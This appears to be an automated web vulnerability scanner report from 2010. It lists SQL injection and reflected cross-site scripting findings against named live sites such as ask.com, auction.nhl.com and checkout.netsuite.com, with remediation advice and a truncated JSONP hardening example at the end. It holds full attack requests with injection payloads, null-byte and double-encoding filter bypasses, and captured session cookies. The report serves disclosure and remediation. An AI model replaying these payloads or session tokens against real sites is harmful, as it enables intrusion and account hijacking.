SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Issue remediation
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 25257047'%20or%201%3d1--%20 and 25257047'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /jsignin25257047'%20or%201%3d1--%20?o=0&l=dir HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE2OjQ3OjQxLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|0~5491|0~5397|0; qc=0; cu.wz=0; gcht=; wz_sid=0346C8EF73F2B3A933ADE477A41477DA; wz_uid=0C41C9EC70F2B3A933ADE477A41477DA; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user=o=0&l=dir; __utmb=252994457.2.10.1290271572;
The gc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the gc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /local?qsrc=3103 HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=%00'; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE2OjQ3OjQxLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|0~5491|0~5397|0; qc=0; cu.wz=0; gcht=; wz_sid=0346C8EF73F2B3A933ADE477A41477DA; wz_uid=0C41C9EC70F2B3A933ADE477A41477DA; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user=o=0&l=dir; __utmb=252994457.2.10.1290271572;
Diners who want to experience exceptional Indian cuisine take a short trip to Bombay Brasserie. Now, in addition to our existing West University location, we are pleased to announce the opening of our Galleria location, just off of 610 and ...[SNIP]...
Request 2
GET /local?qsrc=3103 HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=%00''; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE2OjQ3OjQxLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|0~5491|0~5397|0; qc=0; cu.wz=0; gcht=; wz_sid=0346C8EF73F2B3A933ADE477A41477DA; wz_uid=0C41C9EC70F2B3A933ADE477A41477DA; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user=o=0&l=dir; __utmb=252994457.2.10.1290271572;
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the kw request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2636'%3balert(1)//bbf2983398d was submitted in the kw parameter. This input was echoed as b2636';alert(1)//bbf2983398d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
2.2. http://ad.vulnerable.ad.partner/adj/Auctions/ros [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.vulnerable.ad.partner
Path: /adj/Auctions/ros
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a2667'-alert(1)-'aad659deeb0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
2.3. http://adserving.cpxinteractive.com/st [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://adserving.cpxinteractive.com
Path: /st
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29442"-alert(1)-"a82b9d9e55a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 16:50:15 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sat, 20 Nov 2010 16:50:15 GMT
Pragma: no-cache
Content-Length: 4334
Age: 0
Proxy-Connection: close
/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://adserving.cpxinteractive.com/imp?29442"-alert(1)-"a82b9d9e55a=1&Z=300x250&s=1299725&_salt=1744088892";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new A ...[SNIP]...
The value of the id request parameter is copied into the HTML document as text between TITLE tags. The payload 5f651</title><script>alert(1)</script>0e9cb24f1cc was submitted in the id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cgi-bin/ncommerce3/User?id=hfcNHL5f651</title><script>alert(1)</script>0e9cb24f1cc&wl=12717464&type=L HTTP/1.1
Host: auction.nhl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be2a4"><script>alert(1)</script>a0866ed5e5f was submitted in the id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cgi-bin/ncommerce3/User?id=hfcNHLbe2a4"><script>alert(1)</script>a0866ed5e5f&wl=12717464&type=L HTTP/1.1
Host: auction.nhl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the type request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2dcbb"><script>alert(1)</script>597da3a48aa was submitted in the type parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cgi-bin/ncommerce3/User?id=hfcNHL&wl=12717464&type=L2dcbb"><script>alert(1)</script>597da3a48aa HTTP/1.1
Host: auction.nhl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d1205'style%3d'x%3aexpression(alert(1))'04ac6827f1e was submitted in the REST URL parameter 4. This input was echoed as d1205'style='x:expression(alert(1))'04ac6827f1e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /app/center/nlvisitor.nl/c.1034828d1205'style%3d'x%3aexpression(alert(1))'04ac6827f1e/n.3/sc.6/.f HTTP/1.1
Host: checkout.netsuite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=LycGMyBNRjjQpg2yQxfl568LH03v7PJ2JZhbrvfVJvqcPnWypyG9MDpC5CBHkTSjvQXJ7XfkxPhrQJbWLwsx4vv2QwMgnpHZ4bfg8R2qCtRQh3R6Q1mQQGCHQQcl4G9c!-548196153; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); StoreEmail=rt'@1.com; NLShopperId7=rnoX2qVXAQEJBIY6; NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1289251037.1290273104.3; __utmc=1; __utmb=1.2.10.1290273104; NLShopperId=rnoX2lhXAQEmkIji;
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ea1e0%2527a%253d%2527b%2527a4e19e91a04 was submitted in the REST URL parameter 5. This input was echoed as ea1e0'a='b'a4e19e91a04 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /app/center/nlvisitor.nl/c.1034828/n.3ea1e0%2527a%253d%2527b%2527a4e19e91a04/sc.6/.f HTTP/1.1
Host: checkout.netsuite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=LycGMyBNRjjQpg2yQxfl568LH03v7PJ2JZhbrvfVJvqcPnWypyG9MDpC5CBHkTSjvQXJ7XfkxPhrQJbWLwsx4vv2QwMgnpHZ4bfg8R2qCtRQh3R6Q1mQQGCHQQcl4G9c!-548196153; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); StoreEmail=rt'@1.com; NLShopperId7=rnoX2qVXAQEJBIY6; NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1289251037.1290273104.3; __utmc=1; __utmb=1.2.10.1290273104; NLShopperId=rnoX2lhXAQEmkIji;
The value of the redirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 12983'><script>alert(1)</script>f4dd61d6b9f81a0d8 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of the redirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 87277'><script>alert(1)</script>0d33e5361ab was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the redirect request parameter is copied into the HTML document as plain text between tags. The payload f1799<script>alert(1)</script>85b0cbdcd5eeb48c1 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67a32"%3b9a1fdcd0d7 was submitted in the REST URL parameter 1. This input was echoed as 67a32";9a1fdcd0d7 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 404 Not Found
Date: Sat, 20 Nov 2010 17:28:59 GMT
Server: Apache
Content-Length: 2691
Expires: Sun, 21 Nov 2010 07:15:59 GMT
Last-Modified: Thu, 01 Jan 1970 00:00:00 GMT
encoding: UTF-8
Content-Language: UTF-8
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=999
Connection: Keep-Alive
Content-Type: text/javascript; charset=UTF-8
...[SNIP]...
alert("Script file 'https://checkout.netsuite.com/67a32";9a1fdcd0d7/site/drop_down_menu/anylinkcssmenu.js' not found");
2.13. https://checkout.netsuite.com/citricle-ga/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://checkout.netsuite.com
Path: /citricle-ga/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7175f\'%3balert(1)//122e2e8962c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7175f\\';alert(1)//122e2e8962c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /citricle-ga/?7175f\'%3balert(1)//122e2e8962c=1 HTTP/1.1
Host: checkout.netsuite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; loginredirect=T; JSESSIONID=dhQMMyJDpGpPkZGgt12gQSdl2ZxqXVLWRpRGDFyvG6Jv4j6tbFfKcQZD64vmtnhKLhRymJDB9Fv1RDGJXWqCm5hvXJvNQ9fxsVfFB0tVjPwKYx6gZ1fBZsh1JQYRnRZG!-1642534427; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); StoreEmail=rt'@1.com; NLShopperId7=rnoX2qVXAQEJBIY6; NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1289251037.1290273104.3; __utmc=1; __utmb=1.4.10.1290273104; NLShopperId=rnoX2lhXAQEmkIji;
2.14. https://checkout.netsuite.com/citricle-ga/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://checkout.netsuite.com
Path: /citricle-ga/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5d377'%20style%3dx%3aexpression(alert(1))%20caad02a7c27 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5d377\' style=x:expression(alert(1)) caad02a7c27 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /citricle-ga/?5d377'%20style%3dx%3aexpression(alert(1))%20caad02a7c27=1 HTTP/1.1
Host: checkout.netsuite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; loginredirect=T; JSESSIONID=dhQMMyJDpGpPkZGgt12gQSdl2ZxqXVLWRpRGDFyvG6Jv4j6tbFfKcQZD64vmtnhKLhRymJDB9Fv1RDGJXWqCm5hvXJvNQ9fxsVfFB0tVjPwKYx6gZ1fBZsh1JQYRnRZG!-1642534427; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); StoreEmail=rt'@1.com; NLShopperId7=rnoX2qVXAQEJBIY6; NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1289251037.1290273104.3; __utmc=1; __utmb=1.4.10.1290273104; NLShopperId=rnoX2lhXAQEmkIji;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49886"%3bd493f9d8869 was submitted in the REST URL parameter 1. This input was echoed as 49886";d493f9d8869 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 404 Not Found
Date: Sat, 20 Nov 2010 17:50:29 GMT
Server: Apache
Content-Length: 2672
Expires: Sun, 21 Nov 2010 07:15:29 GMT
Last-Modified: Thu, 01 Jan 1970 00:00:00 GMT
encoding: UTF-8
Content-Language: UTF-8
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=974
Connection: Keep-Alive
Content-Type: text/javascript; charset=UTF-8
...[SNIP]...
alert("Script file 'https://checkout.netsuite.com/javascript49886";d493f9d8869/help.js' not found");
2.16. https://checkout.netsuite.com/s.nl [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://checkout.netsuite.com
Path: /s.nl
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload %009847a'style%3d'x%3aexpression(alert(1))'ba0bac45916 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9847a'style='x:expression(alert(1))'ba0bac45916 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
2.17. https://checkout.netsuite.com/s.nl [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://checkout.netsuite.com
Path: /s.nl
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8bc49'style%3d'x%3aexpression(alert(1))'02b68d32520 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8bc49'style='x:expression(alert(1))'02b68d32520 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of the vid request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload be972'><script>alert(1)</script>b07e51e7e4a was submitted in the vid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4efa7'-alert(1)-'c39736470a4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/turn4efa7'-alert(1)-'c39736470a4 HTTP/1.1
Host: dictionary.reference.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %005cb94"><script>alert(1)</script>0818a587233 was submitted in the REST URL parameter 1. This input was echoed as 5cb94"><script>alert(1)</script>0818a587233 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /submit%005cb94"><script>alert(1)</script>0818a587233 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 729d1<script>alert(1)</script>ee38120a664 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /red/psi/p.json?callback=_ate.ad.hpr729d1<script>alert(1)</script>ee38120a664 HTTP/1.1
Host: ds.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dt=X; uid=4cd70ff39ffa55be; psc=0; di=%7B%7D..1290096886.10R|1290201756.60|1289335234.66; loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d;
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 246
Content-Type: text/javascript
Set-Cookie: di=%7B%7D..1290271839.10R|1290201756.60|1289335234.66; Domain=.addthis.com; Expires=Mon, 19-Nov-2012 04:52:57 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Mon, 20 Dec 2010 16:50:39 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sat, 20 Nov 2010 16:50:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 16:50:39 GMT
Connection: close
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload acd1e<script>alert(1)</script>a8518672223 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
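Both callback findings above come from a JSONP endpoint: the captured response carries Content-Type: text/javascript and the request path is p.json?callback=. The reflected tag therefore only runs as HTML if a browser renders that body as a document, but the fix is the same either way: the callback name must be restricted to a JavaScript identifier before it is written into the response. The following is an added example, not the ds.addthis.com code; the handler shape, the header set and the sample payload are assumptions for illustration.

```javascript
"use strict";
// Added example, not the ds.addthis.com code: a JSONP handler that reflects
// the callback parameter into a script body. The vulnerable form writes the
// parameter verbatim; the hardened form accepts only a dotted JavaScript
// identifier, so the body can never contain a tag, quote or bracket taken
// from the request. Header names and SAMPLE are assumptions for illustration.

// Dotted identifier: _ate.ad.hpr, jQuery.cb123, $cb ... nothing else.
const CALLBACK_RE = /^[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*$/;

function isValidCallback(name) {
  return typeof name === "string" && name.length <= 64 && CALLBACK_RE.test(name);
}

// Vulnerable: whatever arrived in ?callback= becomes the start of the body.
function jsonpVulnerable(callback, data) {
  return {
    status: 200,
    headers: { "Content-Type": "text/javascript" },
    body: callback + "(" + JSON.stringify(data) + ");",
  };
}

// Hardened: reject anything that is not an identifier, send nosniff so a
// browser will not render the body as HTML, and lead with a comment so the
// body cannot double as another file format (the prefix large JSONP
// providers adopted against content-type confusion attacks).
function jsonpHardened(callback, data) {
  if (!isValidCallback(callback)) {
    return {
      status: 400,
      headers: { "Content-Type": "text/plain", "X-Content-Type-Options": "nosniff" },
      body: "invalid callback name",
    };
  }
  return {
    status: 200,
    headers: {
      "Content-Type": "application/javascript; charset=utf-8",
      "X-Content-Type-Options": "nosniff",
    },
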